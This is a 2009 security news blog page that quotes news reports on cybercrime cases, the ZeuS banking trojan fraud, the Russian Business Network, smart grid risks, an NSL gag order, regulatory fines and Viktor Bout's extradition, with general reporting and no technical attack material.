Fergie's Tech Blog
Friday, October 23, 2009
Thursday, October 22, 2009
Thailand Rejects U.S. Pressure Over 'Merchant of Death'
Russian alleged arms dealer Viktor Bout shows a victory sign at the Criminal Court in Bangkok in August.
Via The Thailand Post.
A senior Thai prosecutor rejected pressure from Washington Thursday over its appeal for the extradition of Russian arms dealer Viktor Bout, known as the "Merchant of Death".More here.
Bangkok's appeals court is considering an appeal by the Thai government against the criminal court's ruling in August that Bout should not be sent to the United States to stand trial.
A US official said Wednesday that US President Barack Obama on his Asia trip next month will press Thailand to go ahead with the extradition.
Bout's colourful life is said to have inspired the Hollywood film "Lord of Death" and he is accused of peddling weapons around the world, including to Al-Qaeda.
Image source: The Thailand Post
SCADA Watch: 'Smart Grids Are Like a Hacker's Wet Dream'
Angus Kidman writes on ITWire.com:
"Smart grids are like a hacker's wet dream," IRA Winkler, president of Internet Security Advisors Group, told a press briefing at RSA Conference Europe in London this week.More here.
The essential problem is that smart grid devices like intelligent power meters are PC-based and are thus subject to all the vulnerabilities of any computer system. "Smart grids are essentially computers that have a special purpose," Winkler said.
An added complication is that the means of updating smart grid equipment when vulnerabilities are detected is not clear. "If somebody finds a single vulnerability, who is going to be responsible for upgrading it?"
While electricity networks are often government regulated even in markets like Australia where power supply is being privatised, that doesn't necessarily simplify the issue, Winkler said. "Just imagine if the government said 'We are sending government agents to update all your systems.'"
Overall mistrust of computer reliability might also be a problem, Winkler suggested. "Do you want that smart grid in your house to be able to reboot?"
Wednesday, October 21, 2009
Russian Police And Internet Registry Accused Of Aiding Cyber Crime
Amsterdam-based Internet registry organisation RIPE NCC has been singled out for its involvement with notorious criminal network provider Russian Business Network (RBN) by the UK's Serious Organised Crime Agency.More here.
The registrar took money from the well-known criminal organisation, and subsequently corruption in the Russian police allowed the network's organisers to escape SOCA's clutches according to Andy Auld, head of intelligence for the agency's e-crime department, speaking at the RSA Conference Europe security event this week in London.
RIPE NCC denies any wrong-doing and Auld explain that the registrar wasn't actually being investigated for its involvement with RBN - but as the registry body had accepted payment from the Russian criminal organisation, it could be seen by some as having been complicit in criminal activities, he said.
"An entity like Russian Business Network - a criminal ISP and recognised as such by just about every media outlet worldwide that covers these things - RBN was registered as local internet registry with RIPE, the European body allocating IP resources to industry," explained Auld.
The SOCA officer argued that any company that does business with a known cyber-criminal organisation such as RBN could itself be open to accusations of acting illegally.
Experts See Forecast Worsen for Cyber Crime
Jeremy Kirk writes on PC World:
Law enforcement agencies can count a few recent victories against cybercriminals, but agents say the battle against them isn't getting any easier.More here.
Highly organized cybercriminals are using increasingly sophisticated tools and methods that make them hard to trace, said Keith Mularski, supervisory special agent with the U.S. Federal Bureau of Investigation's Cyber Division.
"They have evolved over the years," Mularkski said. "It really is organized crime."
Mularski, who spoke at the RSA conference in London on Wednesday, has had great success in infiltrating organized cybercrime rings. He successfully infiltrated a ring known as DarkMarket, an online forum where criminals bought and sold personal data, such as credit card numbers. DarkMarket was shut down about a year ago and 59 people were arrested, with the help of authorities in the U.K., Germany, Turkey and other countries.
While the DarkMarket bust was a big win, there are still such forums operating today and they're hard to infiltrate. New members must be vetted for reliability and to ensure they're not agents like Mularski.
Tuesday, October 20, 2009
U.S. Toll in Iraq, Afghanistan
Iraq and Afghanistan statistics via The Boston Globe (AP).
As of Tuesday, Oct. 20, 2009, at least 4,351 members of the U.S. military had died in the Iraq war since it began in March 2003, according to an Associated Press count.More here and here.
The figure includes nine military civilians killed in action. At least 3,474 military personnel died as a result of hostile action, according to the military's numbers.
The AP count is four fewer than the Defense Department's tally, last updated Tuesday at 10 a.m. EDT.
As of Tuesday, Oct. 20, 2009, at least 805 members of the U.S. military had died in Afghanistan, Pakistan and Uzbekistan as a result of the U.S. invasion of Afghanistan in late 2001, according to the Defense Department. The department last updated its figures Tuesday at 10 a.m. EDT.
Of those, the military reports 622 were killed by hostile action.
Honor the Fallen.
More ZeuS Damage
Brian Krebs writes on Security Fix:
I discovered the latest example of this failure just last week, when I spoke with Genlabs Corp., a chemical manufacturing firm based in Chino, Calif. Even though Genlabs' business banking account was protected by a security token code and a password, the thieves still were able to break into the firm's account online and transfer $437,000 to 50 different co-conspirators around the country.More here.
Joyce Nicola, Genlabs' controller, said the thieves infected a PC belonging to a subordinate who was helping to set up new payroll accounts for the company. Normally, Nicola said, when they log in to their account at the bank, the site asks for a user name on one page, then the next page requests a password, and a third and final page requires the user to type in the output from a key fob that generates a new six-digit number every 60 seconds. When the employee logged in to the bank's site on the morning on the 16th, all three of those fields were instead present on the bank's home page.
A local computer forensics expert later determined that an infection from the "Zbot Trojan" (a.k.a., "Zeus") had allowed the attackers to re-write the bank's login screen as displayed on the employee's computer, so that the credentials were intercepted before they could be sent on to the bank's actual Web site. The technician's report on the Zeus infection -- available here [.pdf] -- is worth reading, particularly points 5 and 6, which noted that the infection could not be diagnosed from within Windows.
To date, Genlabs has succeeded in reversing just $48,000 worth of fraudulent transfers, Nicola said.
Judge Refuses to Lift 5-Year-Old Patriot Act Gag Order
David Kravets writes on Threat Level:
A federal judge on Tuesday declined to remove a gag order imposed on the president of a small ISP who wants to reveal the contents of a national security letter he received from the FBI.More here.
The NSL demanded the president of the New York company provide the government with e-mails from a customer the government deemed a threat. An NSL, a type of self-issued subpoena fortified by the Patriot Act, allows the FBI to obtain telecommunication, financial and credit records relevant to a government investigation without a court warrant.
The case last hit the courts in December, when the 2nd U.S. Circuit Court of Appeals, in a decision with Sonia Sotomayor in the majority, narrowed the standard by which recipients of NSLs must keep mum.
Those supplying the requested data to the government are forbidden from disclosing their mandatory cooperation, and face up to five years in prison for breaching the gag. The government issues about 50,000 NSLs each year, and an internal audit showed widespread government abuse in connection to them.
On Tuesday, a New York judge ruling in the lawsuit brought by the anonymous ISP president, declined to lift the gag placed on him, despite the new gagging standards announced by the 2nd Circuit. The lower court judge’s decision was based on secret evidence the FBI provided.
Cyber Attacks Smite Atheist Websites
Asher Moses writes on The Age:
Australian atheists are under attack, with the websites of both the Atheist Foundation of Australia and the Global Atheist Convention knocked offline in a major cyber attack yesterday afternoon.More here.
The "distributed denial of service" attacks flooded the websites with traffic, forcing them offline about 5.20pm yesterday.
As of this morning, the foundation had still not been able to restore the websites.
The attacks may be related to the Global Atheist Convention, which is being held in Melbourne in March next year. Speakers include Richard Dawkins, author of The God Delusion and comedy writer Catherine Deveny.
Image source: The Age / Reuters
Trial Set to Begin in Economic Espionage Case Involving China
Jaikumar Vijayan writes on ComputerWorld:
A jury trial is set to begin in a somewhat rare trade-secret theft case in which federal prosecutors are trying to prove that two engineers misappropriated trade secrets from a U.S. technology company to benefit China's government.More here.
The case is being prosecuted under a rarely used provision of the Economic Espionage Act (EEA) of 1996, which deals with the theft of trade secrets for the benefit of a foreign nation. The law was passed in response to a perceived need to protect U.S. trade secrets and intellectual property from foreign government-sponsored theft.
There have been only five cases so far in which individuals have been indicted under this provision in the EEA. Last June, Xiaodong Meng, 44, a software engineer born in China, became the first to be sentenced under the law.
Meng was sentenced to two years and ordered to pay a fine of $10,000 after he pleaded guilty to, among other things (PDF document), stealing at least six source-code products and more than 100 other software components from his employer, Quantum 3D Inc.
FTC Slams MoneyGram With $18M Charge to Settle Fraud Complaints
Michael Cooney writes in NetworkWorld:
This place sounds like scam central. The second-largest money transfer service in the United States, MoneyGram International today agreed to pay $18 million in consumer redress to settle FTC charges that the company allowed its money transfer system to be used by fraudulent telemarketers to bilk U.S. consumers out of tens of millions of dollars.More here.
The FTC charged that between 2004 and 2008, MoneyGram agents helped fraudulent telemarketers and other con artists who tricked US consumers into wiring more than $84 million within the United States and to Canada – after these consumers were falsely told they had won a lottery, were hired for a secret shopper program, or were guaranteed loans. The $84 million in losses is based on consumer complaints to MoneyGram – actual consumer losses likely are much higher, the FTC stated.
The FTC charged that MoneyGram knew that its system was being used to defraud people but did very little about it, and that in some cases its agents in Canada actually participated in these schemes. According to the FTC’s complaint, MoneyGram knew, or avoided knowing, that about 131 of its more than 1,200 agents accounted for more than 95% of the fraud complaints it received in 2008 regarding money transfers to Canada; a similarly small number of agents was responsible for more than 96% of all fraud complaints to the company in 2006.
Voice Over IP 'Hacker' in Court Today
Ed Berridge writes on The Inquirer:
A Venezuelan has been dragged to the US to face trial on charges of hacking into voice over IP networks.More here.
Edwin Pena, 26, was arrested in Mexico last year. The 20-count indictment charges Pena with conspiracy to secretly hack into the computer networks of unsuspecting Voice over Internet Protocol ( VoIP ) phone service providers, conspiracy to commit wire fraud by transmitting telephone calls over the victims' networks, and individual hacking and wire fraud counts.
An FBI spokesman said that the extradition represents the continued success of the United States in working with foreign countries to bring alleged cyber criminals to justice.
Monday, October 19, 2009
ChoicePoint to Pay Fine for Second Data Breach
Grant Gross writes on PC World:
Data broker ChoicePoint, the victim of a 2004 data breach affecting more than 160,000 U.S. residents, has agreed to strengthen its data security efforts and pay a fine for a second breach in 2008, the U.S. Federal Trade Commission said Monday.More here.
ChoicePoint, now a subsidiary of Reed Elsevier, will pay US$275,000 to resolve the newest FTC complaint. The FTC accused the company of failing to implement a comprehensive information security program to protect consumers' personal information, as required by the agency after the 2004 breach.
The April 2008 breach compromised the personal data of 13,750 people, the FTC said in a press release. ChoicePoint turned off a "key" electronic security tool used to monitor access to one of its databases, and failed to detect that the security tool was turned off for four months, the FTC said.
For a 30-day period, an unknown hacker conducted thousands of unauthorized searches of a ChoicePoint database containing sensitive consumer information, including Social Security numbers, the FTC said. After discovering the breach, the company notified the FTC.
If the software tool had been working, ChoicePoint likely would have detected the intrusions "much earlier," the FTC said.